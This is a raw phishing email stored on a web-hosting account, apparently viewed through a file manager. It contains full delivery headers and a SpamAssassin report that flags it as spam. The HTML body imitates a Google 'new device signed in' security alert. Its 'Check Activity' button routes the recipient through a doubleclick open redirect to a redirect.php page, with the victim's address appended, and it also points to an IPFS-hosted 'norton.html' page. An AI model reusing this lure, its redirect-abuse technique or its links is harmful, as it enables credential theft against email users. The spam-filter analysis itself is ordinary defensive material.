OwlCyberSecurity - MANAGER

Edit File: 1740147156.M703155P178375.premium128.web-hosting.com,S=8730,W=8876:2,

Return-Path: <kiswel@kiswel.co.jp> Delivered-To: contact+spam@gourayafroid.com Received: from premium128.web-hosting.com by premium128.web-hosting.com with LMTP id 6FYRKNSJuGfHuAIAAvhI2g (envelope-from <kiswel@kiswel.co.jp>) for <contact+spam@gourayafroid.com>; Fri, 21 Feb 2025 09:12:36 -0500 Return-path: <kiswel@kiswel.co.jp> Envelope-to: contact@gourayafroid.com Delivery-date: Fri, 21 Feb 2025 09:12:36 -0500 Received: from [36.139.226.177] (port=58723 helo=kiswel.co.jp) by premium128.web-hosting.com with esmtp (Exim 4.96.2) (envelope-from <kiswel@kiswel.co.jp>) id 1tlTlX-000nKN-29 for contact@gourayafroid.com; Fri, 21 Feb 2025 09:12:36 -0500 From: gourayafroid.com <kiswel@kiswel.co.jp> To: contact@gourayafroid.com Date: 21 Feb 2025 22:11:41 +0800 Message-ID: <20250221221141.694E5C5E81D1138F@kiswel.co.jp> MIME-Version: 1.0 Content-Type: text/html Content-Transfer-Encoding: quoted-printable X-Spam-Status: Yes, score=7.0 X-Spam-Score: 70 X-Spam-Bar: +++++++ X-Spam-Report: Spam detection software, running on the system "premium128.web-hosting.com", has identified this incoming email as possible spam. The original message has been attached to this so you can view it or label similar future email. If you have any questions, see root\@localhost for details. Content preview: New device signed in to contact@gourayafroid.com Your Account was just signed in to a new Windows device. You're getting this email to make sure it was you. Check Activity You can also see security activity Content analysis details: (7.0 points, 5.0 required) pts rule name description ---- ---------------------- -------------------------------------------------- 0.0 URIBL_BLOCKED ADMINISTRATOR NOTICE: The query to URIBL was blocked. See http://wiki.apache.org/spamassassin/DnsBlocklists#dnsbl-block for more information. [URIs: englishwithwaliul.com] 0.1 URIBL_SBL_A Contains URL's A record listed in the Spamhaus SBL blocklist [URIs: ipfs.io] 0.0 RCVD_IN_VALIDITY_CERTIFIED_BLOCKED RBL: ADMINISTRATOR NOTICE: The query to Validity was blocked. See https://knowledge.validity.com/hc/en-us/articles/20961730681243 for more information. [36.139.226.177 listed in sa-accredit.habeas.com] 0.0 RCVD_IN_VALIDITY_RPBL_BLOCKED RBL: ADMINISTRATOR NOTICE: The query to Validity was blocked. See https://knowledge.validity.com/hc/en-us/articles/20961730681243 for more information. [36.139.226.177 listed in bl.score.senderscore.com] 1.5 SPF_HELO_SOFTFAIL SPF: HELO does not match SPF record (softfail) 1.5 SPF_SOFTFAIL SPF: sender does not match SPF record (softfail) 0.0 HTML_MESSAGE BODY: HTML included in message 0.0 T_MXG_EMAIL_FRAG URI with email in fragment 0.1 MIME_HTML_ONLY BODY: Message only has text/html MIME parts 0.0 URI_IPFSIO References Interplanetary File System PtP content via ipfs.io, likely phishing 0.0 KAM_DMARC_STATUS Test Rule for DKIM or SPF Failure with Strict Alignment 0.2 KAM_DMARC_NONE DKIM has Failed or SPF has failed on the message and the domain has no DMARC policy 0.0 KAM_SHORT Use of a URL Shortener for very short URL 2.0 RDNS_NONE Delivered to internal network by a host with no rDNS 0.0 T_PDS_FROM_NAME_TO_DOMAIN From:name looks like To:domain 0.0 T_KAM_HTML_FONT_INVALID Test for Invalidly Named or Formatted Colors in HTML 0.0 URI_IPFS References Interplanetary File System PtP content, probable phishing 1.5 PDS_FRNOM_TODOM_DBL_URL From Name to domain, double URL 0.0 TO_NO_BRKTS_NORDNS_HTML To: lacks brackets and no rDNS and HTML only X-Spam-Flag: YES Subject: ***SPAM*** Important Notice - New Device Signed In <html><head> <meta http-equiv=3D"X-UA-Compatible" content=3D"IE=3Dedge"> </head> <body> <div align=3D"center" style=3D"padding: 40px 20px; border-radius: 8px; bord= er: thin solid rgb(218, 220, 224); color: rgb(34, 34, 34); text-transform: = none; text-indent: 0px; letter-spacing: normal; font-family: Arial, Helveti= ca, sans-serif; font-size: small; font-style: normal; font-weight: 400; wor= d-spacing: 0px; white-space: normal; box-sizing: border-box; orphans: 2; wi= dows: 2; background-color: rgb(255, 255, 255); font-variant-ligatures: norm= al; font-variant-caps: normal;=20 -webkit-text-stroke-width: 0px; text-decoration-thickness: initial; text-de= coration-style: initial; text-decoration-color: initial;"><div style=3D"lin= e-height: 32px; padding-bottom: 24px; border-bottom-color: rgb(218, 220, 22= 4); border-bottom-width: thin; border-bottom-style: solid; box-sizing: bord= er-box;"><div style=3D"box-sizing: border-box;"><span style=3D'font-family:= "Google Sans", Roboto, RobotoDraft, Helvetica, Arial, sans-serif; font-siz= e: 24px;'>New device signed in&nbsp;to<span> &nbsp;</span><b>contact@gourayafroid.com</b></span></div><br style=3D"box-s= izing: border-box;"></div><div style=3D"line-height: 20px; padding-top: 20p= x; font-family: Roboto-Regular, Helvetica, Arial, sans-serif; box-sizing: b= order-box;"><span style=3D"font-size: 14px; box-sizing: border-box;">Your A= ccount was just signed in to a new Windows device. You're getting this emai= l to make sure it was you.</span><div style=3D"padding-top: 32px; box-sizin= g: border-box;"> <a style=3D'padding: 10px 24px; border-radius: 5px; color: rgb(255, 255, 25= 5); line-height: 16px; font-family: "Google Sans", Roboto, RobotoDraft, Hel= vetica, Arial, sans-serif; display: inline-block; min-width: 90px; box-sizi= ng: border-box; background-color: rgb(65, 132, 243); text-decoration-line: = none;'=20 href=3D"https://ad.doubleclick.net/ddm/trackclk/N4892.5020.4774291382421/B2= 3999293.271539123;dc_trk_aid=3D466016770;dc_trk_cid=3D131101292;dc_lat=3D;d= c_rdid=3D;tag_for_child_directed_treatment=3D;tfua=3D?https://englishwithwa= liul.com/euope/redirect.php#contact@gourayafroid.com" target=3D"_blank" rel= =3D"noreferrer"=20 data-saferedirecturl=3D"https://www.google.com/url?q=3Dhttps://ipfs.io/ipfs= /QmeYTsM5YN8b5ySGxfZ3sRkGQb5jveGwX9bx4mAKAaWMa9?filename%3Dnorton.html%23za= vir@zavir.com&amp;source=3Dgmail&amp;ust=3D1740216346427000&amp;usg=3DAOvVa= w1VUdaKz1ZXXnWto3jL0g_3"><font size=3D"4" style=3D"box-sizing: border-box;"= >Check Activity</font></a></div></div><div style=3D"color: rgb(95, 99, 104)= ; line-height: 16px; letter-spacing: 0px; padding-top: 20px; font-size: 12p= x; box-sizing: border-box;"> You can also see security activity<br style=3D"box-sizing: border-box;">&nb= sp;</div></div> <div style=3D"color: rgb(34, 34, 34); text-transform: none; text-indent: 0p= x; letter-spacing: normal; font-family: Arial, Helvetica, sans-serif; font-= size: small; font-style: normal; font-weight: 400; word-spacing: 0px; white= -space: normal; box-sizing: border-box; orphans: 2; widows: 2; background-c= olor: rgb(255, 255, 255); font-variant-ligatures: normal; font-variant-caps= : normal; -webkit-text-stroke-width: 0px; text-decoration-thickness: initia= l; text-decoration-style: initial;=20 text-decoration-color: initial;"><div style=3D"line-height: 18px; padding-t= op: 12px; font-family: Roboto-Regular, Helvetica, Arial, sans-serif; font-s= ize: 11px; box-sizing: border-box;"><div style=3D"box-sizing: border-box;">= You received this email to let you know about important changes to your<spa= n>&nbsp;</span><font color=3D"#1155cc">contact@gourayafroid.com</font>&nbsp= ;Account and services.</div><div style=3D"direction: ltr; box-sizing: borde= r-box;"> &copy; 2025&nbsp;<a style=3D"color: rgb(17, 85, 204); box-sizing: border-bo= x; background-color: transparent; text-decoration-line: none;" href=3D"http= ://link.net/" target=3D"_blank" rel=3D"noreferrer" data-saferedirecturl=3D"= https://www.google.com/url?q=3Dhttp://link.net/&amp;source=3Dgmail&amp;ust= =3D1740216346427000&amp;usg=3DAOvVaw0Wuh30AQtv1vcbyGSUJtHL">link.net</a>&nb= sp;&nbsp;LLC,&nbsp;<a style=3D"color: inherit; line-height: 18px; padding-t= op: 12px; box-sizing: border-box; background-color: transparent;"> 1600 Amphitheatre Parkway, Mountain View, CA 94043, USA</a></div></div></di= v></body></html>